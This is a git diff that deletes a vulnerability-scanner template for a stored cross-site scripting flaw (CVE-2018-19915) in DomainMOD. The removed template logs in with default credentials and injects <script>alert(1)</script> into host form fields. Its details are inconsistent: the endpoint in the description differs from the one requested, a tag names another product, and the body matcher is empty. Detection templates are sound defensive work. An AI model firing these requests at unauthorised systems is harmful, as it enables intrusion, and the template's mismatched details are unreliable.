diff --git a/cves/2018/CVE-2018-19915.yaml b/cves/2018/CVE-2018-19915.yaml deleted file mode 100644 index d67c16b7fa..0000000000 --- a/cves/2018/CVE-2018-19915.yaml +++ /dev/null @@ -1,66 +0,0 @@ -id: CVE-2018-19915 - -info: - name: DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via \assets/edit/host.php?whid=5' parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 - - https://github.com/domainmod/domainmod/issues/87 - metadata: - verified: true - tags: wbcecms,xss - -requests: - - raw: - - - | - GET /domain/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - | - POST /domain/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username=admin&new_password=admin123 - - - | - POST /domain/assets/add/host.php?whid=11 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Origin: https://{{Hostname}} - Referer: http://{{Hostname}}/domain/assets/add/host.php - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - - new_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - - - | - GET /domain/assets/hosting.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/domain/assets/add/host.php - - cookie-reuse: true - matchers-condition: and - redirects: true - max-redirects: 3 - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 \ No newline at end of file